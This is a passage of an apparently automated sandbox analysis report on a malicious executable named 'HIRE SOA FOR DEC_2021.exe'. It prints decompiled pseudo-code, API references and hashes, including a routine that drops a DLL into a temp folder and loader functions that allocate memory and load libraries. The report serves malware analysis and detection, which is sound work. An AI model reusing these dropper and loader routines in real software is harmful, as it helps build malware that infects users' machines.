							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040389b
0x004038a0
0x004038a6
0x004038ab
0x004038ab
0x004038b3
0x00000000
0x00000000
0x004038bb
0x004038c3
0x004038c5
0x004038cb
0x004038cb
0x004038cd
0x004038d9
0x00000000
0x00000000
0x004038dd
0x00000000
0x00000000
0x00000000
0x004038df
0x004038e4
0x004038ed
0x004038f3
0x004038f8
0x0040390c
0x00403917
0x0040392f
0x00403935
0x0040393a
0x00403942
0x00403963
0x00403963
0x00403963
0x00403944
0x00403946
0x00403946
0x0040394a
0x00403951
0x00403951
0x00403956
0x0040395c
0x0040395c
0x00000000
0x00403946
0x004038fa
0x004038ff
0x00403908
0x00403901
0x00403901
0x00403901
0x004038ff

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403898
1033, xrefs: 0040389B, 004038A5, 00403916

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-517883005
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

0x00404d7f
0x00404da4
0x00404dc4
0x00404dc7
0x00404dca
0x00404de1
0x00404de7
0x00404dee
0x00404df5
0x00404dfc
0x00404e01
0x00404e07
0x00000000
0x00404e17
0x00404db1
0x00404e04
0x00404e04
0x00000000
0x00404e04
0x00404dbd
0x00404dbf
0x00000000
0x00404dbf
0x00404d85
0x00000000
0x00000000
0x00404d8c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024b0
0x004024b0
0x004024b3
0x004024ce
0x004024b5
0x004024b7
0x004024bc
0x004024c3
0x004024d5
0x0040264e
0x0040264e
0x004024db
0x004024ed
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x00402880
0x0040288c

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll
API String ID: 427699356-2691233350
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\Desktop, xrefs: 004055BF

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: HIRE SOA FOR DEC_2021.exePID: 4744, Parent PID: 7124COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.7%
Total number of Nodes:	584
Total number of Limit Nodes:	72

Executed Functions

Function 0041869A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5

Strings

A:A, xrefs: 004186BC, 004186C8

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: 78c16a3cdf2627815ee6cce4bb0c01881c375d1657158271962eedcd99d383ab
Instruction ID: e975971011a3680b6146c1bf445bd77a5579b0307f28725910ec5bce8fb80aa9
Opcode Fuzzy Hash: 78c16a3cdf2627815ee6cce4bb0c01881c375d1657158271962eedcd99d383ab
Instruction Fuzzy Hash: E6F014B2200108AFDB04DF99DC90EEB77ADEF8C354F128249FA0CD3241C631E9558BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;
				void* _t31;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t31, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}

0x004186a3
0x004186af
0x004186b7
0x004186bc
0x004186e5
0x004186e9

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5

Strings

A:A, xrefs: 004186BC, 004186C8

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B50(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b6c
0x00409b6f
0x00409b74
0x00409b79
0x00409b83
0x00409b88
0x00409b8b
0x00409b8d
0x00409b95
0x00409b9a
0x00409b9a
0x00409ba1
0x00409ba9
0x00409bac
0x00409bae
0x00409bc2
0x00000000
0x00409bc4
0x00409bca
0x00409b7e
0x00409b7e
0x00409b7e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004187CA Relevance: 1.5, APIs: 1, Instructions: 42
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004187CA(void* __ebx, void* __ecx, void* __edx, long _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _v117;
				intOrPtr* __esi;
				void* _t14;
				intOrPtr* _t22;

				if(__ecx - 1 <= 0) {
					return  *((intOrPtr*)( *_t22))(_a12, _t14, __edx);
				} else {
					__dh = __dh + __bl;
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					_t7 = __eax + 0xc60; // 0xca0
					__esi = _t7;
					__eax = E004191F0(__edi, __fp0, __eax, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x30);
					__edx = _a28;
					__eax = _a24;
					__ecx = _a20;
					__edx = _a16;
					__eax = _a12;
					__ecx = _a8;
					__edx =  *__esi;
					__eax = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}

0x004187cb
0x0041878d
0x004187cd
0x004187cd
0x004187d1
0x004187d3
0x004187d6
0x004187df
0x004187df
0x004187e7
0x004187ec
0x004187ef
0x004187f2
0x004187f9
0x004187fd
0x00418801
0x00418805
0x00418809
0x0041880b
0x0041880c
0x0041880d
0x0041880d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 22c1069b62d6a5735d36c1a3acad3073592c3f2cce64ca034b27789521877b17
Instruction ID: 462a911b48f7912435a5a4239b2a4dbb7f659c7190f1fb6790929b25fef28b60
Opcode Fuzzy Hash: 22c1069b62d6a5735d36c1a3acad3073592c3f2cce64ca034b27789521877b17
Instruction Fuzzy Hash: 21F037B6200208BBDB14DF99DC80EEB77A9EF88254F14824DFE0D97241D631E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;
				void* _t35;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _t35, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ff
0x00418607
0x0041863d
0x00418641

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187D0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;
				void* _t25;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _t25, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187df
0x004187e7
0x00418809
0x0041880d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041871A Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0041871A(void* __eax, intOrPtr _a8, void* _a12) {
				long _t11;
				void* _t14;
				void* _t24;

				_pop(_t14);
				asm("aaa");
				asm("fsubr st0, st0");
				asm("in eax, 0x55");
				_t8 = _a8;
				_t3 = _t8 + 0x10; // 0x300
				_t4 = _t8 + 0xc50; // 0x409773
				E004191F0(_t14, _t24, _a8, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a12); // executed
				return _t11;
			}

0x0041871a
0x0041871b
0x0041871c
0x0041871f
0x00418723
0x00418726
0x0041872f
0x00418737
0x00418745
0x00418749

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 380e007f3cc228f35efb8f0565f544537b560e1688ba9285db1539e8243a7a65
Instruction ID: b0d72c53595fe69c063d3b5e8ba9437a8a189f3917042e6a986fa2c77ad786a0
Opcode Fuzzy Hash: 380e007f3cc228f35efb8f0565f544537b560e1688ba9285db1539e8243a7a65
Instruction Fuzzy Hash: A9E086766002147BD711EFD8CC85EDB7768EF44650F104569F91C9B243D530EA0186D0

Uniqueness

Uniqueness Score: -1.00%

Function 00418720 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;
				void* _t15;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _t15, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418723
0x00418726
0x0041872f
0x00418737
0x00418745
0x00418749

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_HIRE SOA FOR DEC_2021.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B898F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B898FA

Memory Dump Source

Source File: 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2121d80e5489137baab5c53b221496aae71c76516c08579aa3012bd5ba75d4de
Instruction ID: f60257dc806cad3b0440a92fcac567bc580d315f321adf892a5d719a55bd238b
Opcode Fuzzy Hash: 2121d80e5489137baab5c53b221496aae71c76516c08579aa3012bd5ba75d4de
Instruction Fuzzy Hash: 8A90026260100502D601715A4504616045AD7D0381F91C076A1014555ECA658DA2F171

Uniqueness

Uniqueness Score: -1.00%

Function 00B89860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B8986A

Memory Dump Source

